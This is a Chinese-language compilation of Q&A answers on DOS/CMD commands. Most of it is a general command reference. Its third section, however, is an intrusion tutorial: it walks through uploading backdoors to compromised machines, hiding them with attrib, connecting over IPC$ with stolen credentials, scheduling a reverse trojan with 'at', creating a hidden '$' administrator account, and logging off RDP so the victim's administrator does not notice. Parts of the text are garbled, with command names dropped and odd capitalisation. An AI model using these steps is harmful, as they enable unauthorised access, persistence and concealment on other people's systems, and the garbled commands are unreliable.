Ⅰ XP SP3下cmd中help命令怎麼用
主要是你的系統裡面沒有help.exe,我給你傳一個 ,Vista中也是一樣的
Ⅱ 求所有CMD的指令
DOS命令集-回憶DOS命令集-回憶(一)MD——建立子目錄 1.功能:創建新的子目錄 2.類型:內部命令 3.格式:MD[盤符:][路徑名]〈子目錄名〉 4.使用說明: (1)「盤符」:指定要建立子目錄的磁碟驅動器字母,若省略,則為當前驅動器; (2)「路徑名」:要建立的子目錄的上級目錄名,若預設則建在當前目錄下。 例:(1)在C盤的根目錄下創建名為FOX的子目錄;(2)在FOX子目錄下再創建USER子目錄。 C:、>MD FOX (在當前驅動器C盤下創建子目錄FOX) C:、>MD FOX 、USER (在FOX 子目錄下再創建USER子目錄) (二)CD——改變當前目錄 1.功能:顯示當前目錄 2.類型:內部命令 3.格式:CD[盤符:][路徑名][子目錄名] 4.使用說明: (1)如果省略路徑和子目錄名則顯示當前目錄; (2)如採用「CD、」格式,則退回到根目錄; (3)如採用「CD.。」格式則退回到上一級目錄。 例:(1)進入到USER子目錄;(2)從USER子目錄退回到子目錄;(3)返回到根目錄。 C:、>CD FOX 、USER(進入FOX子目錄下的USER子目錄) C:、FOX、USER>CD.。 (退回上一級根目錄) C:、FOX>CD、 (返回到根目錄) C:、> (三)RD——刪除子目錄命令 1.功能:從指定的磁碟刪除了目錄。 2.類型:內部命令 3.格式:RD[盤符:][路徑名][子目錄名] 4.使用說明: (1)子目錄在刪除前必須是空的,也就是說需要先進入該子目錄,使用DEL(刪除文件的命令)將其子目錄下的文件刪空,然後再退回到上一級目錄,用RD命令刪除該了目錄本身; (2)不能刪除根目錄和當前目錄。 例:要求把C盤FOX子目錄下的USER子目錄刪除,操作如下: 第一步:先將USER子目錄下的文件刪空; C、>DEL C:、FOX、USER、*。* 第二步,刪除USER子目錄。 C、>RD C:、FOX、USER (四)DIR——顯示磁碟目錄命令 1.功能:顯示磁碟目錄的內容。 2.類型:內部命令 3.格式:DIR [盤符][路徑][/P][/W] 4. 使用說明:/P的使用;當欲查看的目錄太多,無法在一屏顯示完屏幕會一直往上卷,不容易看清,加上/P參數後,屏幕上會分面一次顯示23行的文件信息,然後暫停,並提示;Press any key to continue /W的使用:加上/W只顯示文件名,至於文件大小及建立的日期和時間則都省略。加上參數後,每行可以顯示五個文件名。 PATH——路徑設置命令 1.功能:設備可執行文件的搜索路徑,只對文件有效。 2.類型:內部命令 3.格式:PATH[盤符1]目錄[路徑名1]{[;盤符2:],〈目錄路徑名2〉…} 4.使用說明: (1)當運行一個可執行文件時,DOS會先在當前目錄中搜索該文件,若找到則運行之;若找不到該文件,則根據PATH命令所設置的路徑,順序逐條地到目錄中搜索該文件; (2)PATH命令中的路徑,若有兩條以上,各路徑之間以一個分號「;」隔開; (3)PATH命令有三種使用方法: PATH[盤符1:][路徑1][盤符2:][路徑2]…(設定可執行文件的搜索路徑) PATH:(取消所有路徑) PATH:(顯示目前所設的路徑) (六)TREE——顯示磁碟目錄結構命令 1.功能:顯示指定驅動器上所有目錄路徑和這些目錄下的所有文件名。 2.類型:外部命令 3.格式:TREE[盤符:][/F][》PRN] 4.使用說明: (1)使用/F參數時顯示所有目錄及目錄下的所有文件,省略時,只顯示目錄,不顯示目錄下的文件; (2)選用>PRN參數時,則把所列目錄及目錄中的文件名列印輸出。 (七)DELTREE——刪除整個目錄命令 1.功能:將整個目錄及其下屬子目錄和文件刪除。 2.類型:外部命令 3.格式:DELTREE[盤符:]〈路徑名〉 4.使用說明:該命令可以一步就將目錄及其下的所有文件、子目錄、更下層的子目錄一並刪除,而且不管文件的屬性為隱藏、系統或只讀,只要該文件位於刪除的目錄之下,DELTREE都一視同仁,照刪不誤。使用時務必小心!!! 五、磁碟操作類命令 (一)formAT——磁碟格式化命令 1.功能:對磁碟進行格式化,劃分磁軌和扇區;同時檢查出整個磁碟上有無帶缺陷的磁軌,對壞道加註標記;建立目錄區和文件分配表,使磁碟作好接收DOS的准備。 2.類型:外部命令 3.格式:formAT〈盤符:〉[/S][/4][/Q] 4.使用說明: (1)命令後的盤符不可預設,若對硬碟進行格式化,則會如下列提示:WARNING:ALL DATA ON NON ——REMOVABLE DISK DRIVE C:WILL BE LOST ! Proceed with format (Y/N)? (警告:所有數據在C盤上,將會丟失,確實要繼續格式化嗎?) (2)若是對軟盤進行格式化,則會如下提示:Insert mew diskette for drive A; and press ENTER when ready… (在A驅中插入新盤,准備好後按回車鍵)。 (3)選用[/S]參數,將把DOS系統文件IO.SYS 、MSDOS.SYS及COMMAND.COM復制到磁碟上,使該磁碟可以做為DOS啟動盤。若不選用/S參數,則格式化後的磙盤只能讀寫信息,而不能做為啟動盤; (4)選用[/4]參數,在1.2MB的高密度軟碟機中格式化360KB的低密度盤; (5)選用[/Q]參數,快速格式化,這個參數並不會重新劃分磁碟的磁軌貌岸然和扇區,只能將磁碟根目錄、文件分配表以及引導扇區清成空白,因此,格式化的速度較快。 (6)選用[/U]參數,表示無條件格式化,即破壞原來磁碟上所有數據。不加/U,則為安全格式化,這時先建立一個鏡象文件保存原來的FAT表和根目錄,必要時可用UNFORRMAT恢復原來的數據。 (二)UNformAT恢復格式化命令 1.功能:對進行過格式化誤操作丟失數據的磁碟進行恢復。 2.類型:外部命令 3.格式:UNformAT〈盤符〉[/L][/U][/P][/TEST] 4.使用說明:用於將被「非破壞性」格式化的磁碟恢復。根目錄下被刪除的文件或子目錄及磁碟的系統扇區(包括FAT、根目錄、BOOT扇區及硬碟分區表)受損時,也可以用UNformAT來搶救。 (1)選用/L參數列出找到的子目錄名稱、文件名稱、大孝日期等信息,但不會真的做formAT工作。 (2)選用/P參數將顯示於屏幕的報告(包含/L參數所產生的信息)同時也送到列印機。運行時屏幕會顯示:「Print out will be sent to LPT1」 (3)選用/TEST參數只做模擬試驗(TEST)不做真正的寫入動作。使用此參數屏幕會顯示:「Simulation only」 (4)選用/U參數不使用MIRROR映像文件的數據,直接根據磁碟現狀進行UNformAT。 (5)選用/PSRTN;修復硬碟分區表。 若在盤符之後加上/P、/L、/TEST之一,都相當於使用了/U參數,UNformAT會「假設」此時磁碟沒有MIRROR映像文件。 注意:UNformAT對於剛formAT的磁碟,可以完全恢復,但formAT後若做了其它數據的寫入,則UNformAT就不能完整的救回數據了。UNformAT並非是萬能的,由於使用UNformAT會重建FAT與根目錄,所以它也具有較高的危險性,操作不當可能會擴大損失,如果僅誤刪了幾個文件或子目錄,只需要利用UNDELETE就夠了。 三) CHKDSK——檢查磁碟當前狀態命令 1.功能:顯示磁碟狀態、內存狀態和指定路徑下指定文件的不連續數目。 2.類型:外部命令 3.格式:CHKDSK [盤符:][路徑][文件名][/F][/V] 4.使用說明: (1)選用[文件名]參數,則顯示該文件佔用磁碟的情況; (2)選[/F]參數,糾正在指定磁碟上發現的邏輯錯誤; (3)選用[/V]參數,顯示盤上的所有文件和路徑。 (四)DISKCOPY——整盤復制命令 1.功能:復制格式和內容完全相同的軟盤。 2.類型:外部命令 3.格式:DISKCOPY[盤符1:][盤符2:] 4.使用說明: (1)如果目標軟盤沒有格式化,則復制時系統自動選進行格式化。 (2)如果目標軟盤上原有文件,則復制後將全部丟失。 (3)如果是單驅動器復制,系統會提示適時更換源盤和目標盤,請操作時注意分清源盤和目標盤。 (五)LABEL——建立磁碟卷標命令 1.功能:建立、更改、刪除磁碟卷標。 2.類型:外部命令 3.格式:LABEL[盤符:][卷標名] 4.使用說明: (1)卷標名為要建立的卷標名,若預設此參數,則系統提示鍵入卷標名或詢問是否刪除原有的卷標名; (2)卷標名由1至11個字元組成。 (六)VOL——顯示磁碟卷標命令 1.功能:查看磁碟卷標號。 2.類型:內部命令 3.格式:VOL[盤符:] 4.使用說明:省略盤符,顯示當前驅動器卷標。 (七)SCANDISK——檢測、修復磁碟命令 1.功能:檢測磁碟的FAT表、目錄結構、文件系統等是否有問題,並可將檢測出的問題加以修復。 2.類型:外部命令 3.格式:SCANDISK[盤符1:]{[盤符2:]…}[/ALL] 4.使用說明: (1)CCANDISK適用於硬碟和軟盤,可以一次指定多個磁碟或選用[/ALL]參數指定所有的磁碟; (2)可自動檢測出磁碟中所發生的交*連接、丟失簇和目錄結構等邏輯上的錯誤,並加以修復。 (八)DEFRAG——重整磁碟命令 1.。功能:整理磁碟,消除磁碟碎塊。 2.類型:外部命令 3.格式:DEFRAG[盤符:][/F] 4.使用說明:選用/F參數,將文件中存在盤上的碎片消除,並調整磁碟文件的安排,確保文件之間毫無空隙。從而加快讀盤速度和節省磁碟空間。 (九)SYS——系統復制命令 1.功能:將當前驅動器上的DOS系統文件IO.SYS,MSDOS.SYS和COMMAND.COM 傳送到指定的驅動器上。 2.類型:外部命令 3.格式:SYS[盤符:] *使用說明:如果磁碟剩餘空間不足以存放系統文件,則提示:No roomfor on destination disk. 文件操作類命令 (一) COPY文件復制命令 1.功能:拷貝一個或多個文件到指定盤上。 2.類型:內部命令 3.格式:COPY [源盤][路徑]〈源文件名〉[目標盤][路徑][目標文件名] 4.使用說明: (1)COPY是文件對文件的方式復制數據,復制前目標盤必須已經格式化; (2)復制過程中,目標盤上相同文件名稱的舊文件會被源文件取代; (3)復制文件時,必須先確定目標般有足夠的空間,否則會出現;insufficient的錯誤信息,提示磁碟空間不夠; (4)文件名中允許使用通配舉「*」「?」,可同時復制多個文件; (5)COPY命令中源文件名必須指出,不可以省略。 (6)復制時,目標文件名可以與源文件名相同,稱作「同名拷貝」此時目標文件名可以省略; (7)復制時,目標文件名也可以與源文件名不相同,稱作「異名拷貝」,此時,目標文件名不能省略; (8)復制時,還可以將幾個文件合並為一個文件,稱為「合並拷貝」,格式如下:COPY;[源盤][路徑]〈源文件名1〉〈源文件名2〉…[目標盤][路徑]〈目標文件名〉; (9)利用COPY命令,還可以從鍵盤上輸入數據建立文件,格式如下:COPY CON [盤符:][路徑]〈文件名〉; (10)注意:COPY命令的使用格式,源文件名與目標文件名之間必須有空格! (二)XCOPY——目錄復制命令 1.功能:復制指定的目錄和目錄下的所有文件連同目錄結構。 2.類型:外部命令 3.格式:XCOPY [源盤:]〈源路徑名〉[目標盤符:][目標路徑名][/S][/V][/E] 4.使用說明: (1)XCOPY是COPY的擴展,可以把指定的目錄連文件和目錄結構一並拷貝,但不能拷貝隱藏文件和系統文件; (2)使用時源盤符、源目標路徑名、源文件名至少指定一個; (3)選用/S時對源目錄下及其子目錄下的所有文件進行COPY。除非指定/E參數,否則/S不會拷貝空目錄,若不指定/S參數,則XCOPY只拷貝源目錄本身的文件,而不涉及其下的子目錄; (4)選用/V參數時,對的拷貝的扇區都進行較驗,但速度會降低。 (三)TYPE——顯示文件內容命令 1.功能:顯示ASCII碼文件的內容。 2.類型:內部命令。 3.格式:TYPE[盤符:][路徑]〈文件名〉 4.使用說明: (1)顯示由ASCII碼組成的文本文件,對。EXE.COM等為擴展名的文件,其顯示的內容是無法閱讀的,沒有實際意義2; (2)該命令一次只可以顯示一個文件的內容,不能使用通配符; (3)如果文件有擴展名,則必須將擴展名寫上; (4)當文件較長,一屏顯示不下時,可以按以下格式顯示;TYPE[盤符:][路徑]〈文件名〉|MORE,MORE為分屏顯示命令,使用些參數後當滿屏時會暫停,按任意鍵會繼續顯示。 (5)若需將文件內容列印出來,可用如下格式: TYPE[盤符:][路徑]〈文件名〉,>PRN 此時,列印機應處於聯機狀態。
Ⅲ 入門DOS命令
大家在入侵時,一定會用到DOS命令的,它的功能非常的強大.今天我就對常用的DOS命令作個詳細的解說.主要是給剛入門者和接觸DOS命令少的朋友看的.下面我挑幾個比較常用的給大家說說.
以windows2000為例,windows xp類同.
DIR
顯示當前盤下的所有文件夾和文件.
比較常用的方法是,你上傳一個後門或服務端(這兒比如名字叫systems.exe)到肉雞的c:\winnt\system32下,你想看看有沒有上傳成功.可以用DIR命令看一下. 命令如下 :
DIR c:\winnt\system32\systems.exe
則會顯示:
2004-05-24 20:06 194,762 systems.exe
1 個文件 194,762 位元組
0 個目錄 4,658,597,888 可用位元組
如果你沒有上傳成功,則顯示如下:
驅動器 C 中的卷沒有標簽。
卷的序列號是 6458-3DB8
c:\winnt\system32\的目錄
找不到文件
CD
改變當前目錄
具體看一下下面的命令:
C:\>cd winnt //進入winnt文件夾
C:\winnt>cd system32 //進入system32 文件夾
C:\winnt\system32>cd.. //回到上一級目錄
C:\winnt>cd..
C:\>
C:\>d: //進入D盤
D:\>e: //進入E盤
E:\>
del和deltree
DEL:刪除文件.
看下面的命令:
C:\>del c:\xx\ww.txt //刪除C盤的XX目錄下的名叫WW的文件.
C:\>
C:\>del c:\xx\*.* //刪除C盤的XX目錄下所有文件
deltree
這個更具有破壞性,不但能刪除所有文件,連文件夾也刪除
C:\>deltree c:\winnt //刪除C盤下的winnt所有文件和文件夾.
這個大家要小心使用.
attrid
顯示和更改文件或文件夾屬性.
文件或文件夾的屬性有 隱藏,用字母H表示. 只讀,用R表示. 存檔,用A表示. 系統,用S表示
改變一個文件或文件夾屬性, " + " 表示增加, " - ",表示去掉某個屬性.
平時我們都把後門或服務端到上傳肉雞的c:\winnt\system32下.在進入了肉雞的CMD以後,為了更加的不讓肉雞管理員知道,我們可以把你上傳的隱藏起來.比如還是上面的systems.exe
命令如下:
C:\>attrid +h c:\winnt\system32\systems.exe //這樣在system32下就找不到systems.exe
C:\>attrid -h c:\winnt\system32\systems.exe //去掉systems.exe的隱藏屬性
復制一個或多個文件到其它目錄
比如你把C盤下一個叫1.txt文件復制到D盤的vv文件夾下,
C:\> c:\1.txt d:\vv\1.exe
比如你和肉雞建立了IPC$連接(如何連接?以後會講的),而且肉雞開放了共享,這里比如開放了D盤.你可以把你C盤下的一個叫systems.exe的後門或服務端上傳肉雞的D盤下,命令如下:
C:\> c:\systems.exe \\肉雞IP\d$
type
顯示文件內容
我現在在我的C盤的XX目錄下新建一個叫hack.txt的文件,內容是一些台灣的IP
命令如下:
C:\>type c:\xx\hack.txt
序號 開始IP地址 結束IP地址 國家/省/直轄市 城市/區縣/組織
58 024.179.140.000 024.179.150.255 中國台灣省
80 061.013.000.000 061.013.255.255 中國台灣省
86 061.058.065.000 061.058.070.255 中國台灣省
87 061.059.160.000 061.059.255.255 中國台灣省
89 061.070.100.000 061.070.150.255 中國台灣省
1788 061.217.179.000 061.217.179.255 中國台灣省 台南市
1789 061.216.000.000 061.219.255.255 中國台灣省
1790 061.220.080.000 061.220.150.255 中國台灣省 台北市
1791 061.224.000.000 061.224.255.255 中國台灣省 台北市
1792 061.225.000.000 061.225.255.255 中國台灣省
3390 134.208.000.000 134.208.255.255 中國台灣省
3584 139.175.000.000 139.175.255.255 中國台灣省
3590 140.092.000.000 140.092.255.255 中國台灣省
3593 140.096.000.000 140.096.255.255 中國台灣省
3596 140.112.000.000 140.112.255.255 中國台灣省 台灣大學
C:\>
它還有一個用法,就是在進入肉雞的CMD以後,看看肉雞用的是什麼操作系統,命令如下,在我電腦操作的結果如下:
C:\>type c:\boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"
/fastdetect
看出來沒有?,我用的是XP系統.
這是一些我認為常用的命令,其它的還有rd,md等.你們有興趣可以找資料看看.平進比較少用.
ping
這個是用的最多的命令.可是現在好像不靈光了.大多數網站和個人電腦用防火牆屏蔽了ping.大多數時候根本是P不通.基本命令:
ping ip
ping 網址
下面P的是本站:
C:\>ping www.hf110.com
Pinging www.hf110.com [218.89.0.231] with 32 bytes of data:
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=66ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Ping statistics for 218.89.0.231:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 66ms, Maximum = 67ms, Average = 66ms
上面P出本站的IP是218.89.0.231,從TTL=116.大略看出使用的是windows操作系統.一般來說TTL值在128左右的是windows操作系統,值在225左右的,大多數是unix類系統.但是還有特殊情況,管理員可能會通過改注冊表來修改TTL值.
net use
在得到肉雞的用戶名和密碼這後,可以用這個命令做IPC$連接
net use \\肉雞ip\ipc$ "密碼" /user:"用戶名"
連接成功後,上傳後門或服務端,(比如叫systems.exe,在你的D盤下).
D:\systems.exe \\肉雞ip\c$ //這里它要開放共享,你才能上傳.否則無法上傳成功.
net time \\肉雞ip //看一下肉雞的時間,是24小時制.比如這兒是下午3點10分.寫作15:10
at \\肉雞ip 15:12 systems.exe //在15:12分,運行systems.exe
在這兒,你上傳的是反彈木馬的話,可以等著它來連接你.其實在入侵過程中,有很多的偶然性,比如上面的,你可以IPC連接成功.但是並一定能夠通過net time \\肉雞ip ,看肉雞時間.就算能看到時間吧,有時肉雞的at服務並沒有打開.就算打開了,但是後門或服務端不一定能夠有機會運行,
可能被殺毒軟體查殺.所以在入侵過程中,失敗是常有的事.這個方法不行,可以另一種.
net user
查看用戶或新建一個用戶.
這是在我電腦上的截圖
C:\>net user
\\BILLGATES 的用戶帳戶
---------------------------------------------------------------------
Guest guest1 HelpAssistant
SUPPORT_388945a0 yhkj
命令成功完成。
C:\>
上面是我所有的用戶.
現在我新建一個setwell的用戶,密碼是123456, 截圖如下
C:\>net user setwell 123456 /add
命令成功完成。
C:\>net localgroup administrators setwell /add //這條命令是加setwell為管理員
命令成功完成。
接下來我們再net user ,載圖如下
C:\>net user
\\BILLGATES 的用戶帳戶
----------------------------------------------------------------
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。
建立的用戶可以用net user命令看到,我們在用戶後面加個$,可以小小的隱藏一下.這次建一個叫set的用戶,截圖如下:
C:\>net user set$ 123456 /add
命令成功完成。
C:\>net localgroup administrators set$ /add
命令成功完成。
C:\>net user
\\BILLGATES 的用戶帳戶
-----------------------------------------------------------------
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。
C:\>
看到沒有,我們沒有看到剛才建立的用戶set$,可以用這個命令看,net localgroup administrators ,這個命令的是顯示所有的管理員,截圖如下:
C:\>net localgroup administrators
別名 administrators
注釋 管理員對計算機/域有不受限制的完全訪問權
成員
------------------------------------------------------
guest1
set$
setwell
yhkj
命令成功完成。
C:\>
看到沒有,我們看到set$這個用戶了.
如果要刪除用戶用這個命令:
C:\>net user setwell /delete
net start
1.啟動某些服務
比如: net start telnet //啟動telnet服務
2.查看當前啟動了什麼服務.看看我的電腦啟動了什麼服務:
C:\>net start
已經啟動以下 Windows 服務:
Automatic Updates
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Messenger
這只是一部分服務.
net stop
停止某些服務.站長今天也說到了.我不多了.
net share
查看默認共享.也就是查看這些共享C$ D$ e$ f$ admin$ ipc$,這是系統默認的.我的全部關了,我
到肉雞上截張圖吧.
C:\Documents and Settings\Administrator>net share
D$ D:\ 默認共享
F$ F:\ 默認共享
ADMIN$ C:\WINNT 遠程管理
C$ C:\ 默認共享
E$ E:\ 默認共享
命令成功完成。
C:\Documents and Settings\Administrator>
這個肉雞的IPC$共享竟然關了.
net view
也是查看共享,但不是上面的默認共享了,還是來張截圖吧.也是肉雞的,
C:\Documents and Settings\Administrator>net view
伺服器名稱 注釋
-------------------------------------------------------------------------------
\\17
\\HMZ
\\ZGH
命令成功完成。
C:\Documents and Settings\Administrator>
學DOS命令看起來有點煩,其實是挺容易學的.而且學好了,在入侵中,會起到舉足輕重的作用.下次講netstat 等命令.
netstat -an
使用這個命令可以察看到和本機的所有的連接.看一下在我電腦上的截圖,
D:\>netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING
TCP 180.254.158.42:139 0.0.0.0:0 LISTENING
TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1035 *:*
UDP 0.0.0.0:1037 *:*
UDP 0.0.0.0:1134 *:*
UDP 0.0.0.0:1136 *:*
Proto Local Address Foreign Address State
協議 本地埠及IP地址 遠程埠及IP地址 狀態
LISTENING 監聽狀態 表示等待對方連接
ESTABLISHED 正在連接著.
TCP 協議是TCP
UDP 協議是UDP
TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED
這個表示 利用tcp協議 本機ip(218.95.49.187通過埠:2935 和遠程ip(218.89.0.231)埠:80連接
query
這個命令只有在開了3389埠(也不一定埠是3389,說不定改成別的埠了.嚴格講應是開了遠程終端服務)的機子,才能用上.我用1$的用戶名上了一台3389機子,看一下截圖:
c:\>query user
USERNAME SESSIONNAME ID STATE
administrator console 0 運行中
1$ rdp-tcp#2 1 運行中
看到上面沒有,管理員也在,如果你要退出的話,就用如下命令:
logoff ID 這兒是logoff 1.
這是正常退出的.說到退出,還有一個辦法,就是在開始---關機---注銷1$.如果你用另外的方法退出的話,那麼肉雞在關機時,會出現類如"有一個其它客人登錄到這台伺服器,如果你退出,對方的會話數據會丟失"一類的話.這樣管理員就會發現了.
Ⅳ cmd下的命令有什麼做什麼的
上課里我們已經學習了不少DOS命令,但那隻是很小的一部分,在這課將簡要介紹其它一些命令。
首先,在這一節先回憶一下上課的內容,不要學過就忘啊,多使用幾次就能記住的。好,開始吧,看你學得怎麼樣。
cd 改變當前目錄 sys 製作DOS系統盤
拷貝文件 del 刪除文件
deltree 刪除目錄樹 dir 列文件名
disk 制磁碟 edit 文本編輯
format 格式化磁碟 md 建立子目錄
mem 查看內存狀況 type 顯示文件內容
rd 刪除目錄 ren 改變文件名
記得多少啊,忘了就去上課看看,下面四個命令是新的,給出命令格式,你自己試試看,學電腦重要的就是摸索。
cls 清屏
〔適用場合〕 屏幕上太亂了,或是屏幕上出現亂碼了, 清除屏幕上顯示內容但不
影響電腦內部任何信息
〔用 法〕 cls 回車
move 移動文件,改目錄名
〔適用場合〕 移動文件到別的目錄
〔用 法〕 move [文件名] [目錄] 移動文件至新目錄下
move [目錄名] [目錄名] 改目錄名
〔例 子〕 c:\>move c:\autoexec.bat c:\old�
移動autoexec.bat文件至old目錄下
c:\>move c:\config.sys c:\temp�
移動config.sys文件至old目錄下
more 分屏顯示
〔適用場合〕 當輸出很多一屏顯示不下時採用,幾乎適合所有命令,尤其是type
等命令時很有用。 使用more時磁碟不能有防寫,也不適合光碟機。
〔用 法〕 type [文件名] | more 分屏顯示文件內容
more < [文件名] 分屏顯示文件內容
〔例 子〕 C:\>type msdos.w40 | more
x 拷貝目錄和文件
〔適用場合〕 在進行連同子目錄一起拷貝時很有用,在拷貝大量文件時比COPY命令
要快得多
〔用 法〕 x [文件名] [目錄] 將指定文件拷貝到指定目錄
x [源目錄] [目的目錄] 將源目錄連子目錄考到目的目錄下
x *.* [目錄] /s 將文件與非空子目錄拷貝到指定目錄
其它常用參數還有: v 拷貝後校驗,會影響速度
e 與s 相似,但即使子目錄是空的也會拷貝
help
我們已經學習了不少DOS命令,是不是感到記憶起來很困難,其實高手都不記命令的用法,而只是知道某個命令可以解決某個問題,或在哪個場合下該用哪個命令,用時就現查該命令的用法(當然這要求你首先得有一定英文基礎,而且知道哪個命令是幹啥的,如果都不行沒辦法,就只好記了,或者學windows吧)
那該怎樣查一個命令的用法呢?這就要用到help命令,它可提供所有命令的幫助。
help 幫助
〔適用場合〕 當您想具體了解DOS命令的使用方法時使用
〔用 法〕 help 提供所有DOS命令幫助
help [DOS命令] 提供有關命令的幫助
如果你只大致記得某個命令,可以在提示符後直接輸入help命令,然後將出現下面的畫面:
將游標移至需查詢的命令,回車後可查詢到其語法格式,比如 cd 命令吧:
將游標移至<Notes>,回車後可查詢到其詳細語法及功能的解釋;將游標移至<Examples>,回車後可查詢到其語法的詳細舉例,我們常用舉例功能,下面是點<Examples>後出現的畫面
如你記得是什麼命令就好辦了,可以按Alt+S鍵選擇"Find"(查找),則會彈出下面的對話框
輸入需查找的DOS命令,回車後可立即查詢到有關命令的詳細信息
attrib|data|lable
attrib 設置文件屬性
〔適用場合〕 想對文件做較特殊的處理時
〔用 法〕 attrib 顯示所有文件的屬性
attrib +r或-r [文件名] 設置文件屬性是否為只讀
attrib +h或-h [文件名] 設置文件屬性是否隱含
attrib +s或-s [文件名] 設置文件屬性是否為系統文件
attrib +a或-a [文件名] 設置文件屬性是否為歸檔文件
attrib /s 設置包括子目錄的文件在內的文件屬性
〔例 子〕 C:\TEST>attrib +r wina20.386
C:\>attrib +h *.* /s� 隱含所有文件
date 顯示及修改日期
〔適用場合〕 想知道或修改時間和日期
〔用 法〕 date 顯示和改變當前日期
〔例 子〕 C:\>date 09-20-1996� 將日期改為1996年9月20日
C:\>date�
Current date is Tue 08-20-1996
Enter new date (mm-dd-yy):09-20-1996
按月-日-年的順序修改當前日期 直接按回車鍵忽略修改日期
lable 設置卷標號
〔適用場合〕 用來為磁碟做個標記
〔用 法〕 label 顯示磁碟卷標
label [盤符] [卷標名] 設定指定盤的卷標
〔例 子〕 C:\>label�
Volume in drive C is WANG
Volume Serial Number is 2116-1DD0
volume label (11 characters,Enter for none)?
可以輸入卷標,直接回車後
Delete current volume label (Y/N)?
按y刪除舊卷標,按n不更改
defrag
defrag 磁碟碎片整理
〔適用場合〕 磁碟讀寫次數很多,或磁碟使用時間很長了,可能需要使用這條命令
整理磁碟。磁碟碎片並不是指磁碟壞了,而只是由於多次的拷貝和刪
除文件後,磁碟使用會很不連貫,致使速度變慢。
〔用 法〕 1. C:\>defrag�
2. 選擇要整理的磁碟
3. 電腦分析磁碟狀況,然後告訴我們磁碟有多少需整理。按Esc鍵
4. 選擇Optimization Method(磁碟優化方法),選擇「全部優化」
或「僅優化文件」
5. 選擇Begin Optimization 開始整理
6. 整理完後,按回車鍵
7. 按Esc退出。
doskey|fdisk
doskey 調用和建立DOS宏命令
〔適用場合〕 經常需要輸入重復的命令時,有非常大的用處
〔用 法〕 doskey
將doskey駐留內存,開辟出緩沖區,以後輸入的命令都將保存在緩沖
區中,可以隨時調用
doskey [宏命令名]=[命令名]
將宏命令定義為命令,以後輸入宏命令,電腦就會執行相應的命令
doskey /reinstall 重新安裝doskey
doskey /bufsize= 設置緩沖區的大小
doskey /macros 顯示所有doskey宏
doskey /history 顯示內存中所有命令
doskey /insert|overstrike 設置新鍵入的字元是否覆蓋舊的字元
〔例 子〕 C:\>DOSKEY�
C:\>dir
C:\> C:\temp\*.* a:
C:\>del c:\temp\*.*
C:\> b:\*.* c:\temp
上述四條命令都已被保存,用游標控制鍵的上下可以依次選擇使用或
修改, 也可以用F7鍵列出保存的所有命令
C:\>doskey di=dir/w/p� 定義di為宏命令,意思是執行dir/w/p
fdisk 硬碟分區
〔建 議〕 只有硬碟被很利害的病毒感染時,或是一塊新硬碟才需要分區,最好
請懂行的人指導。硬碟都需經過低級格式化,分區,格式化三個步驟
才可使用,成品電腦內的硬碟都已經做過這些加工了。
〔用 法〕 輸入fdisk後按回車即可進入提示界面
emm386|lh|memmaker
emm386 擴展內存管理
〔建 議〕 這條命令比較復雜,在第五章中系統配置里將詳細介紹
lh/loadhigh 將程序裝入高端內存
〔適用場合〕 這條命令一般用在autoexec.bat中,當有些軟體需要的基本內存很大
時,它會有用
〔用 法〕 lh [程序]
將程序裝入高端內存 使用此命令時,config.sys文件中需有下面兩
條語句。 device=emm386.exe dos=umb
lh [程序] /l:區號 將程序裝入指定的umb區
lh /s 一般是由memmaker專用
〔例 子〕 C:\MOUSE\>lh mouse� 將滑鼠驅動程序裝入高端內存
memmaker 內存優化管理
〔適用場合〕 這個命令現在已經很少用了,在當年DOS流行時,想玩游戲可少不了
它,它可以騰出許多基本內存供游戲使用,只需安裝一次即可
〔用 法〕 1. C:\>memmaker�
2. 回車繼續,F3退出
3. 選擇手動安裝和自動安裝,直接回車表示自動安裝(回車得了)
4. 選擇是否有程序需要擴充內存,可用空格鍵選擇,Yes表示需要,
No不需要,按回車鍵即可。
5. 程序自動檢測硬碟內是否安裝了WINDOWS
6. 軟碟機中若有軟盤則應將其取出,然後按回車鍵,電腦將重新起動
兩次,不要中斷,只需按回車鍵。
msd|undelete
msd 系統檢測
〔適用場合〕 用於檢查系統信息
〔用 法〕 1. C:\>msd 回車後可見到如下畫面,在每個選項旁邊加了註解,表
示該按鈕的功用
�
2. 選擇需查詢的項目,比如選第一個Computer,將會彈出一個對話框
顯示電腦的一些基本信息。你可以試試其他的選項,看看有什麼用。
3. 按Alt+F鍵激活下拉菜單後, 選擇"Exit"項退出。
undelete 恢復被刪除的文件
〔適用場合〕 當不小心刪錯了文件時,它可以用得上。
DOS刪除文件時,只是將文件從分配表中去除,在磁碟存儲區內將文
件名的第一個字母刪除,文件內容並未馬上從磁碟中刪除,所以能恢
復。
〔用 法〕 undelete 恢復已刪除的文件
undelete /all 恢復文件且不再詢問是否恢復,
以"#%&-"的順序為第一個
字母來恢復文件
undelete /list 列可恢復的文件名
undelete /s 可將undelete駐留內存,但幾乎沒人這樣使用
prompt|restore
prompt 設置提示符
〔適用場合〕 當你厭煩了c:\>的提示符或者您想使您的提示符與眾不同時,您可以
試一試,非常有趣的DOS命令,可以隨時顯示時間與日期。
〔用 法〕 prompt $p$g 以當前目錄名和>號為提示符,這是最常用的提示符
prompt $t 表示時間 prompt $d 表示日期
prompt $$ 表示$ prompt $q 表示=
prompt $v 表示當前版本 prompt $l 表示<
prompt $b 表示| prompt $h 表示退位符
